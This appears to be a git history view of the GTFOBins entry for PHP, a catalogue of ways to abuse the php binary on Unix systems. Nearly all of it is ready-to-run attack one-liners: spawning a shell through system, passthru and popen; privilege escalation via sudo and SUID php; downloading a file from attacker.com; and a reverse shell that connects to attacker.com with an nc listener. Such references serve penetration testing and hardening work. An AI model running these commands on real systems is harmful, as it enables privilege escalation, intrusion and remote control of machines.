1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 19:01:59 +02:00
GTFOBins.github.io/_gtfobins/php.md

50 lines
1.8 KiB
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-06-04 19:40:46 +02:00
execute-interactive:
- code: |
export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
- code: |
export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));'
- code: |
export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));'
- code: |
export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
- code: |
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
2018-05-25 15:30:02 +02:00
execute-non-interactive:
2018-05-21 21:14:41 +02:00
- code: |
export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
2018-05-25 14:07:26 +02:00
sudo-enabled:
- code: |
2018-06-04 19:40:46 +02:00
CMD="/bin/sh"
2018-05-25 14:07:26 +02:00
sudo php -r "system('$CMD');"
suid-enabled:
- code: |
2018-06-04 19:40:46 +02:00
CMD="/bin/sh"
2018-05-25 14:07:26 +02:00
./php -r "system('$CMD');"
2018-05-21 21:14:41 +02:00
upload:
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
2018-05-21 21:14:41 +02:00
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
- description: Fetch a remote file via HTTP GET request.
2018-06-01 00:20:23 +02:00
code: |
2018-05-24 21:59:21 +02:00
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
2018-05-25 15:30:02 +02:00
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
2018-05-22 20:23:05 +02:00
code: |
2018-05-24 21:59:21 +02:00
export RHOST=attacker.com
2018-05-25 01:10:39 +02:00
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
2018-05-25 01:10:39 +02:00
---